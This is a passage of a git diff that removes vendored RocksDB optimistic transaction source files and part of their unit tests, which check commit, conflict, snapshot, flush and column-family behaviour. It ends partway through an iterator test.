diff --git a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.cc b/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.cc
deleted file mode 100644
index d9db6fd..0000000
--- a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.cc
+++ /dev/null
@@ -1,91 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/transactions/optimistic_transaction_db_impl.h"
-
-#include <string>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "utilities/transactions/optimistic_transaction.h"
-
-namespace rocksdb {
-
-Transaction* OptimisticTransactionDBImpl::BeginTransaction(
-    const WriteOptions& write_options,
-    const OptimisticTransactionOptions& txn_options, Transaction* old_txn) {
-  if (old_txn != nullptr) {
-    ReinitializeTransaction(old_txn, write_options, txn_options);
-    return old_txn;
-  } else {
-    return new OptimisticTransaction(this, write_options, txn_options);
-  }
-}
-
-Status OptimisticTransactionDB::Open(const Options& options,
-                                     const std::string& dbname,
-                                     OptimisticTransactionDB** dbptr) {
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-  Status s = Open(db_options, dbname, column_families, &handles, dbptr);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a reference to
-    // default column family
-    delete handles[0];
-  }
-
-  return s;
-}
-
-Status OptimisticTransactionDB::Open(
-    const DBOptions& db_options, const std::string& dbname,
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles,
-    OptimisticTransactionDB** dbptr) {
-  Status s;
-  DB* db;
-
-  std::vector<ColumnFamilyDescriptor> column_families_copy = column_families;
-
-  // Enable MemTable History if not already enabled
-  for (auto& column_family : column_families_copy) {
-    ColumnFamilyOptions* options = &column_family.options;
-
-    if (options->max_write_buffer_number_to_maintain == 0) {
-      // Setting to -1 will set the History size to max_write_buffer_number.
-      options->max_write_buffer_number_to_maintain = -1;
-    }
-  }
-
-  s = DB::Open(db_options, dbname, column_families_copy, handles, &db);
-
-  if (s.ok()) {
-    *dbptr = new OptimisticTransactionDBImpl(db);
-  }
-
-  return s;
-}
-
-void OptimisticTransactionDBImpl::ReinitializeTransaction(
-    Transaction* txn, const WriteOptions& write_options,
-    const OptimisticTransactionOptions& txn_options) {
-  assert(dynamic_cast<OptimisticTransaction*>(txn) != nullptr);
-  auto txn_impl = reinterpret_cast<OptimisticTransaction*>(txn);
-
-  txn_impl->Reinitialize(this, write_options, txn_options);
-}
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.h b/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.h
deleted file mode 100644
index 48f8380..0000000
--- a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_db_impl.h
+++ /dev/null
@@ -1,43 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-
-namespace rocksdb {
-
-class OptimisticTransactionDBImpl : public OptimisticTransactionDB {
- public:
-  explicit OptimisticTransactionDBImpl(DB* db, bool take_ownership = true)
-      : OptimisticTransactionDB(db), db_(db), db_owner_(take_ownership) {}
-
-  ~OptimisticTransactionDBImpl() {
-    if (!db_owner_) {
-      db_.release();
-    }
-  }
-
-  Transaction* BeginTransaction(const WriteOptions& write_options,
-                                const OptimisticTransactionOptions& txn_options,
-                                Transaction* old_txn) override;
-
-  DB* GetBaseDB() override { return db_.get(); }
-
- private:
-  std::unique_ptr<DB> db_;
-  bool db_owner_;
-
-  void ReinitializeTransaction(Transaction* txn,
-                               const WriteOptions& write_options,
-                               const OptimisticTransactionOptions& txn_options =
-                                   OptimisticTransactionOptions());
-};
-
-}  //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_test.cc b/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_test.cc
deleted file mode 100644
index f627f0e..0000000
--- a/thirdparty/rocksdb/utilities/transactions/optimistic_transaction_test.cc
+++ /dev/null
@@ -1,1401 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <functional>
-#include <string>
-#include <thread>
-
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/transaction.h"
-#include "util/crc32c.h"
-#include "util/logging.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/transaction_test_util.h"
-#include "port/port.h"
-
-using std::string;
-
-namespace rocksdb {
-
-class OptimisticTransactionTest : public testing::Test {
- public:
-  OptimisticTransactionDB* txn_db;
-  DB* db;
-  string dbname;
-  Options options;
-
-  OptimisticTransactionTest() {
-    options.create_if_missing = true;
-    options.max_write_buffer_number = 2;
-    dbname = test::TmpDir() + "/optimistic_transaction_testdb";
-
-    DestroyDB(dbname, options);
-    Open();
-  }
-  ~OptimisticTransactionTest() {
-    delete txn_db;
-    DestroyDB(dbname, options);
-  }
-
-  void Reopen() {
-    delete txn_db;
-    txn_db = nullptr;
-    Open();
-  }
-
-private:
-  void Open() {
-    Status s = OptimisticTransactionDB::Open(options, dbname, &txn_db);
-    assert(s.ok());
-    assert(txn_db != nullptr);
-    db = txn_db->GetBaseDB();
-  }
-};
-
-TEST_F(OptimisticTransactionTest, SuccessTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, Slice("foo"), Slice("bar"));
-  db->Put(write_options, Slice("foo2"), Slice("bar"));
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  txn->GetForUpdate(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  txn->Put(Slice("foo"), Slice("bar2"));
-
-  txn->GetForUpdate(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, WriteConflictTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "bar");
-  db->Put(write_options, "foo2", "bar");
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  txn->Put("foo", "bar2");
-
-  // This Put outside of a transaction will conflict with the previous write
-  s = db->Put(write_options, "foo", "barz");
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-  ASSERT_EQ(1, txn->GetNumKeys());
-
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());  // Txn should not commit
-
-  // Verify that transaction did not write anything
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "bar");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, WriteConflictTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "bar");
-  db->Put(write_options, "foo2", "bar");
-
-  txn_options.set_snapshot = true;
-  Transaction* txn = txn_db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  // This Put outside of a transaction will conflict with a later write
-  s = db->Put(write_options, "foo", "barz");
-  ASSERT_OK(s);
-
-  txn->Put("foo", "bar2");  // Conflicts with write done after snapshot taken
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());  // Txn should not commit
-
-  // Verify that transaction did not write anything
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-  db->Get(read_options, "foo2", &value);
-  ASSERT_EQ(value, "bar");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, ReadConflictTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "foo", "bar");
-  db->Put(write_options, "foo2", "bar");
-
-  txn_options.set_snapshot = true;
-  Transaction* txn = txn_db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  // This Put outside of a transaction will conflict with the previous read
-  s = db->Put(write_options, "foo", "barz");
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());  // Txn should not commit
-
-  // Verify that transaction did not write anything
-  txn->GetForUpdate(read_options, "foo", &value);
-  ASSERT_EQ(value, "barz");
-  txn->GetForUpdate(read_options, "foo2", &value);
-  ASSERT_EQ(value, "bar");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, TxnOnlyTest) {
-  // Test to make sure transactions work when there are no other writes in an
-  // empty db.
-
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  txn->Put("x", "y");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, FlushTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, Slice("foo"), Slice("bar"));
-  db->Put(write_options, Slice("foo2"), Slice("bar"));
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  txn->Put(Slice("foo"), Slice("bar2"));
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  // Put a random key so we have a memtable to flush
-  s = db->Put(write_options, "dummy", "dummy");
-  ASSERT_OK(s);
-
-  // force a memtable flush
-  FlushOptions flush_ops;
-  db->Flush(flush_ops);
-
-  s = txn->Commit();
-  // txn should commit since the flushed table is still in MemtableList History
-  ASSERT_OK(s);
-
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, FlushTest2) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, Slice("foo"), Slice("bar"));
-  db->Put(write_options, Slice("foo2"), Slice("bar"));
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  txn->Put(Slice("foo"), Slice("bar2"));
-
-  txn->GetForUpdate(snapshot_read_options, "foo", &value);
-  ASSERT_EQ(value, "bar2");
-
-  // Put a random key so we have a MemTable to flush
-  s = db->Put(write_options, "dummy", "dummy");
-  ASSERT_OK(s);
-
-  // force a memtable flush
-  FlushOptions flush_ops;
-  db->Flush(flush_ops);
-
-  // Put a random key so we have a MemTable to flush
-  s = db->Put(write_options, "dummy", "dummy2");
-  ASSERT_OK(s);
-
-  // force a memtable flush
-  db->Flush(flush_ops);
-
-  s = db->Put(write_options, "dummy", "dummy3");
-  ASSERT_OK(s);
-
-  // force a memtable flush
-  // Since our test db has max_write_buffer_number=2, this flush will cause
-  // the first memtable to get purged from the MemtableList history.
-  db->Flush(flush_ops);
-
-  s = txn->Commit();
-  // txn should not commit since MemTableList History is not large enough
-  ASSERT_TRUE(s.IsTryAgain());
-
-  db->Get(read_options, "foo", &value);
-  ASSERT_EQ(value, "bar");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, NoSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "AAA", "bar");
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  // Modify key after transaction start
-  db->Put(write_options, "AAA", "bar1");
-
-  // Read and write without a snapshot
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar1");
-  txn->Put("AAA", "bar2");
-
-  // Should commit since read/write was done after data changed
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar2");
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, MultipleSnapshotTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  string value;
-  Status s;
-
-  db->Put(write_options, "AAA", "bar");
-  db->Put(write_options, "BBB", "bar");
-  db->Put(write_options, "CCC", "bar");
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  db->Put(write_options, "AAA", "bar1");
-
-  // Read and write without a snapshot
-  txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_EQ(value, "bar1");
-  txn->Put("AAA", "bar2");
-
-  // Modify BBB before snapshot is taken
-  db->Put(write_options, "BBB", "bar1");
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  // Read and write with snapshot
-  txn->GetForUpdate(snapshot_read_options, "BBB", &value);
-  ASSERT_EQ(value, "bar1");
-  txn->Put("BBB", "bar2");
-
-  db->Put(write_options, "CCC", "bar1");
-
-  // Set a new snapshot
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  // Read and write with snapshot
-  txn->GetForUpdate(snapshot_read_options, "CCC", &value);
-  ASSERT_EQ(value, "bar1");
-  txn->Put("CCC", "bar2");
-
-  s = txn->GetForUpdate(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = txn->GetForUpdate(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = txn->GetForUpdate(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-  s = db->Get(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-  s = db->Get(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar1");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = db->Get(read_options, "BBB", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-  s = db->Get(read_options, "CCC", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "bar2");
-
-  // verify that we track multiple writes to the same key at different snapshots
-  delete txn;
-  txn = txn_db->BeginTransaction(write_options);
-
-  // Potentially conflicting writes
-  db->Put(write_options, "ZZZ", "zzz");
-  db->Put(write_options, "XXX", "xxx");
-
-  txn->SetSnapshot();
-
-  OptimisticTransactionOptions txn_options;
-  txn_options.set_snapshot = true;
-  Transaction* txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  txn2->SetSnapshot();
-
-  // This should not conflict in txn since the snapshot is later than the
-  // previous write (spoiler alert:  it will later conflict with txn2).
-  txn->Put("ZZZ", "zzzz");
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  delete txn;
-
-  // This will conflict since the snapshot is earlier than another write to ZZZ
-  txn2->Put("ZZZ", "xxxxx");
-
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn2;
-}
-
-TEST_F(OptimisticTransactionTest, ColumnFamiliesTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  ColumnFamilyHandle *cfa, *cfb;
-  ColumnFamilyOptions cf_options;
-
-  // Create 2 new column families
-  s = db->CreateColumnFamily(cf_options, "CFA", &cfa);
-  ASSERT_OK(s);
-  s = db->CreateColumnFamily(cf_options, "CFB", &cfb);
-  ASSERT_OK(s);
-
-  delete cfa;
-  delete cfb;
-  delete txn_db;
-  txn_db = nullptr;
-
-  // open DB with three column families
-  std::vector<ColumnFamilyDescriptor> column_families;
-  // have to open default column family
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, ColumnFamilyOptions()));
-  // open the new column families
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFA", ColumnFamilyOptions()));
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFB", ColumnFamilyOptions()));
-  std::vector<ColumnFamilyHandle*> handles;
-  s = OptimisticTransactionDB::Open(options, dbname, column_families, &handles,
-                                    &txn_db);
-  ASSERT_OK(s);
-  assert(txn_db != nullptr);
-  db = txn_db->GetBaseDB();
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  ASSERT_TRUE(txn);
-
-  txn->SetSnapshot();
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn_options.set_snapshot = true;
-  Transaction* txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn2);
-
-  // Write some data to the db
-  WriteBatch batch;
-  batch.Put("foo", "foo");
-  batch.Put(handles[1], "AAA", "bar");
-  batch.Put(handles[1], "AAAZZZ", "bar");
-  s = db->Write(write_options, &batch);
-  ASSERT_OK(s);
-  db->Delete(write_options, handles[1], "AAAZZZ");
-
-  // These keys do no conflict with existing writes since they're in
-  // different column families
-  txn->Delete("AAA");
-  txn->GetForUpdate(snapshot_read_options, handles[1], "foo", &value);
-  Slice key_slice("AAAZZZ");
-  Slice value_slices[2] = {Slice("bar"), Slice("bar")};
-  txn->Put(handles[2], SliceParts(&key_slice, 1), SliceParts(value_slices, 2));
-
-  ASSERT_EQ(3, txn->GetNumKeys());
-
-  // Txn should commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-  s = db->Get(read_options, "AAA", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = db->Get(read_options, handles[2], "AAAZZZ", &value);
-  ASSERT_EQ(value, "barbar");
-
-  Slice key_slices[3] = {Slice("AAA"), Slice("ZZ"), Slice("Z")};
-  Slice value_slice("barbarbar");
-  // This write will cause a conflict with the earlier batch write
-  txn2->Put(handles[1], SliceParts(key_slices, 3), SliceParts(&value_slice, 1));
-
-  txn2->Delete(handles[2], "XXX");
-  txn2->Delete(handles[1], "XXX");
-  s = txn2->GetForUpdate(snapshot_read_options, handles[1], "AAA", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Verify txn did not commit
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  s = db->Get(read_options, handles[1], "AAAZZZ", &value);
-  ASSERT_EQ(value, "barbar");
-
-  delete txn;
-  delete txn2;
-
-  txn = txn_db->BeginTransaction(write_options, txn_options);
-  snapshot_read_options.snapshot = txn->GetSnapshot();
-
-  txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  ASSERT_TRUE(txn);
-
-  std::vector<ColumnFamilyHandle*> multiget_cfh = {handles[1], handles[2],
-                                                   handles[0], handles[2]};
-  std::vector<Slice> multiget_keys = {"AAA", "AAAZZZ", "foo", "foo"};
-  std::vector<std::string> values(4);
-
-  std::vector<Status> results = txn->MultiGetForUpdate(
-      snapshot_read_options, multiget_cfh, multiget_keys, &values);
-  ASSERT_OK(results[0]);
-  ASSERT_OK(results[1]);
-  ASSERT_OK(results[2]);
-  ASSERT_TRUE(results[3].IsNotFound());
-  ASSERT_EQ(values[0], "bar");
-  ASSERT_EQ(values[1], "barbar");
-  ASSERT_EQ(values[2], "foo");
-
-  txn->Delete(handles[2], "ZZZ");
-  txn->Put(handles[2], "ZZZ", "YYY");
-  txn->Put(handles[2], "ZZZ", "YYYY");
-  txn->Delete(handles[2], "ZZZ");
-  txn->Put(handles[2], "AAAZZZ", "barbarbar");
-
-  ASSERT_EQ(5, txn->GetNumKeys());
-
-  // Txn should commit
-  s = txn->Commit();
-  ASSERT_OK(s);
-  s = db->Get(read_options, handles[2], "ZZZ", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // Put a key which will conflict with the next txn using the previous snapshot
-  db->Put(write_options, handles[2], "foo", "000");
-
-  results = txn2->MultiGetForUpdate(snapshot_read_options, multiget_cfh,
-                                    multiget_keys, &values);
-  ASSERT_OK(results[0]);
-  ASSERT_OK(results[1]);
-  ASSERT_OK(results[2]);
-  ASSERT_TRUE(results[3].IsNotFound());
-  ASSERT_EQ(values[0], "bar");
-  ASSERT_EQ(values[1], "barbar");
-  ASSERT_EQ(values[2], "foo");
-
-  // Verify Txn Did not Commit
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  s = db->DropColumnFamily(handles[1]);
-  ASSERT_OK(s);
-  s = db->DropColumnFamily(handles[2]);
-  ASSERT_OK(s);
-
-  delete txn;
-  delete txn2;
-
-  for (auto handle : handles) {
-    delete handle;
-  }
-}
-
-TEST_F(OptimisticTransactionTest, EmptyTest) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  s = db->Put(write_options, "aaa", "aaa");
-  ASSERT_OK(s);
-
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  txn = txn_db->BeginTransaction(write_options);
-  txn->Rollback();
-  delete txn;
-
-  txn = txn_db->BeginTransaction(write_options);
-  s = txn->GetForUpdate(read_options, "aaa", &value);
-  ASSERT_EQ(value, "aaa");
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-  delete txn;
-
-  txn = txn_db->BeginTransaction(write_options);
-  txn->SetSnapshot();
-  s = txn->GetForUpdate(read_options, "aaa", &value);
-  ASSERT_EQ(value, "aaa");
-
-  s = db->Put(write_options, "aaa", "xxx");
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, PredicateManyPreceders) {
-  WriteOptions write_options;
-  ReadOptions read_options1, read_options2;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  txn_options.set_snapshot = true;
-  Transaction* txn1 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  Transaction* txn2 = txn_db->BeginTransaction(write_options);
-  txn2->SetSnapshot();
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  std::vector<Slice> multiget_keys = {"1", "2", "3"};
-  std::vector<std::string> multiget_values;
-
-  std::vector<Status> results =
-      txn1->MultiGetForUpdate(read_options1, multiget_keys, &multiget_values);
-  ASSERT_TRUE(results[1].IsNotFound());
-
-  txn2->Put("2", "x");
-
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  multiget_values.clear();
-  results =
-      txn1->MultiGetForUpdate(read_options1, multiget_keys, &multiget_values);
-  ASSERT_TRUE(results[1].IsNotFound());
-
-  // should not commit since txn2 wrote a key txn has read
-  s = txn1->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  txn1->Put("4", "x");
-
-  txn2->Delete("4");
-
-  // txn1 can commit since txn2's delete hasn't happened yet (it's just batched)
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->GetForUpdate(read_options2, "4", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  // txn2 cannot commit since txn1 changed "4"
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn1;
-  delete txn2;
-}
-
-TEST_F(OptimisticTransactionTest, LostUpdate) {
-  WriteOptions write_options;
-  ReadOptions read_options, read_options1, read_options2;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Test 2 transactions writing to the same key in multiple orders and
-  // with/without snapshots
-
-  Transaction* txn1 = txn_db->BeginTransaction(write_options);
-  Transaction* txn2 = txn_db->BeginTransaction(write_options);
-
-  txn1->Put("1", "1");
-  txn2->Put("1", "2");
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn1;
-  delete txn2;
-
-  txn_options.set_snapshot = true;
-  txn1 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  txn1->Put("1", "3");
-  txn2->Put("1", "4");
-
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  txn1->Put("1", "5");
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn2->Put("1", "6");
-  s = txn2->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options1.snapshot = txn1->GetSnapshot();
-
-  txn2 = txn_db->BeginTransaction(write_options, txn_options);
-  read_options2.snapshot = txn2->GetSnapshot();
-
-  txn1->Put("1", "5");
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn2->SetSnapshot();
-  txn2->Put("1", "6");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-
-  txn1 = txn_db->BeginTransaction(write_options);
-  txn2 = txn_db->BeginTransaction(write_options);
-
-  txn1->Put("1", "7");
-  s = txn1->Commit();
-  ASSERT_OK(s);
-
-  txn2->Put("1", "8");
-  s = txn2->Commit();
-  ASSERT_OK(s);
-
-  delete txn1;
-  delete txn2;
-
-  s = db->Get(read_options, "1", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(value, "8");
-}
-
-TEST_F(OptimisticTransactionTest, UntrackedWrites) {
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  Status s;
-
-  // Verify transaction rollback works for untracked keys.
-  Transaction* txn = txn_db->BeginTransaction(write_options);
-  txn->PutUntracked("untracked", "0");
-  txn->Rollback();
-  s = db->Get(read_options, "untracked", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-  txn = txn_db->BeginTransaction(write_options);
-
-  txn->Put("tracked", "1");
-  txn->PutUntracked("untracked", "1");
-  txn->MergeUntracked("untracked", "2");
-  txn->DeleteUntracked("untracked");
-
-  // Write to the untracked key outside of the transaction and verify
-  // it doesn't prevent the transaction from committing.
-  s = db->Put(write_options, "untracked", "x");
-  ASSERT_OK(s);
-
-  s = txn->Commit();
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "untracked", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-  txn = txn_db->BeginTransaction(write_options);
-
-  txn->Put("tracked", "10");
-  txn->PutUntracked("untracked", "A");
-
-  // Write to tracked key outside of the transaction and verify that the
-  // untracked keys are not written when the commit fails.
-  s = db->Delete(write_options, "tracked");
-
-  s = txn->Commit();
-  ASSERT_TRUE(s.IsBusy());
-
-  s = db->Get(read_options, "untracked", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete txn;
-}
-
-TEST_F(OptimisticTransactionTest, IteratorTest) {
-  WriteOptions write_options;
-  ReadOptions read_options, snapshot_read_options;
-  OptimisticTransactionOptions txn_options;
-  string value;
-  Status s;
-
-  // Write some keys to the db
-  s = db->Put(write_options, "A", "a");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "G", "g");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "F", "f");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "C", "c");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "D", "d");
-  ASSERT_OK(s);
-
